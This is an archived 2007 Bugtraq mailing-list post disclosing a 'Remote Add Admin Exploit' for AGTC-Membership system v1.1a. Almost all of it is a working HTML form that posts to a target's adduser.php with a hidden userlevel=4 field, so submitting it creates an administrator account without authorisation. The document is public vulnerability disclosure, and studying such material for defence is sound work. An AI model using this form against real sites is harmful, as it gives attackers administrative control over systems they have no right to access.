| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071028234855.31499.qmail@securityfocus.com>
Date: 28 Oct 2007 23:48:55 -0000
From: Guns@...0.com.ar
To: bugtraq@...urityfocus.com
Subject: AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit
<!--
- Product : AGTC-Membership system
- Version : 1.1a
- Website : http://www.agtc.co.uk
- Author : 0x90
- HomePage : WwW.0x90.CoM.Ar
- Contact : Guns[at]0x90[dot]com[dot]ar
- Problem : Admin Added Access.
-->
<form name="form1" method="post" action="http://[target]/adduser.php">
<h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit</h3>
<table width="40%" border="1" align="center" bordercolor="#000000">
<tr>
<td width="20%"><div align="right"><strong>User Name:</strong></div></td>
<td width="40%"><input name="username" type="text" id="username" value="" maxlength="15"></td>
</tr>
<tr>
<td><div align="right"><strong>Password:</strong></div></td>
<td><input name="userpass" type="password" id="userpass" value="" maxlength="15"></td>
</tr>
<tr>
<td><div align="right"><strong>Email Address:</strong></div></td>
<td><input name="useremail" type="text" id="useremail" value="" maxlength"25"></td>
</tr>
<input name="userlevel" type="hidden" id="userlevel" value="4">
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Add User">
<input type="reset" name="Submit2" value="Reset"></form></td>
</tr>
</table>
Powered by blists - more mailing lists